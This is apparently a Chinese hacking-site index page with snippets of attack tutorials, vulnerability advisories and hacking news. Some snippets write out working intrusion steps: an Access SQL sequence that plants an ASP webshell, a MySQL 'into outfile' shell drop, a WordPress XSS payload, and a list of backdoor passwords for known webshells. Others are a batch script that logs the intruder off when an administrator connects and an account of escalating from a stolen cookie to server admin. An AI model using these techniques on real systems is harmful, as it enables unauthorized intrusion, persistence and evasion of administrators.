WordPress插件MM Duplicate
标题: WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm www.badguest.cn) 下载地址: http://downloads.wordpress.org/plugin/mm-du...
WordPress的3.2.1核心模块post-template.php XSS漏洞及修复
Author : Darshit Ashara Date : 21/08/2011 Vendor : Wordpress Version: 3.2.1 WordPress核心模块不正确的代码(post-template.php) 导致跨站点脚本。 笔者可以简单地更新 view plaincopy to clipboardprint? </a><script>alert(...
access导出webshell
create table cmd(shell text) insert into cmd (shell) values('<%execute request(1)%>') SELECT shell into [fuck] in 'D:\web\me\backdoorx\asp.asp;x.xls' 'EXCEL 4.0;'from cmd
利比亚.ly域名注册网站被黑
利比亚.ly域名注册网站被黑 但是黑客并没有控制数据库注册表。。 只是黑了首页,其他页面还是完好的,只是有限的攻入了web服务器! 分页可浏览!http://www.nic.ly/whois.php 官方地址:http://www.nic.ly/ 载图留念: 感谢︶ε╰ 憧憬²º¹¹ 投稿!
80后黑客专攻私服广告日赚数十万
群仅有初中、高中文化,自称“骑士”的80后在 传奇私服业内有着响当当的名号。他们日收入数十万,开着玛莎拉蒂、宾利等豪车, 住别墅,投资上千万的写字楼……他们的钱从何而来? 今日上午,重庆市公安局网络安全监察总队透露,被称为“骑士攻击小组” 的19名成员已被警方捉获,他们通过“黑客”技术攻击传奇游戏私服网站,垄断 网站广告代理,从而提取高额广告代理费,涉案金额超过7000万元。 “黑客”攻击网站垄断...
误入网络管理机房
外的收获: 最近跨站传得火热,追随潮流,初研跨站攻击,意外地得到某人才招聘网留言板管理员cookie,cookie中有MD5加密后的密码,在http://www.cmd5.com成功解密。运气真是好到了家,利用域名+该密码成功地进入了FTP,上传大写,就这样忽悠到了webshell。服务器中serv-u默认密码虽改,但安装目录有更改权限,简单添加FTP管理员,顺利得到服务器FTP管理员权限,在网站...
Mysql root导shell
Select '' into outfile 'E:/wwwroot/china/eval.php';//导shell,访问报错,详情不解select load_file('E:/wwwroot/china/eval.php');//读shell,检查shell完整性http://www.xxxxxxx.cn/eval.php 经过asc码格式导成功了。连接密码,cmd select concat...
常见的黑客们的后门密码
r00ts小组 密码:r00ts 组超强功能修正去后门加强S-U提权版 密码hkk007 火狐asp木马(超强版)” 华夏五周年庆典版 密码wrsk **(中国数据) 密码rinima asp 黑客→kissy 密码ceshi2009 Evil sadness 密码5201314 F.S.T 联盟交流群内部版.!别外传噢 密码rfkl username 密码8473...
ASP探测本地端口之MSWINSCK.OCX方案
这个方法很鸡肋,需要服务器有编程环境,mswinsck属于VB控件,装了VC或者VS也行,否则是没有注册的。作为一种思路吧。 MSWINSCK.OCX里的方法可以用来主动连接,但是可能由于本人的ASP功底不够吧,始终没有实现使用Connect方法探测任意IP地址的端口,希望有高人能够写出来代码并能共享出来。 测试环境:Windows 2003 企业版 SP2 IIS 6.0 测试代码: <%...
内网嗅探自我保护用到的批处理
检测管理员上线就注销自已: @echo off :check choice /C YN /T 10 /D Y quser find "#16" && del xx.bat logoff goto check #16 每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1。以上适应使用管理员帐号时。 ----...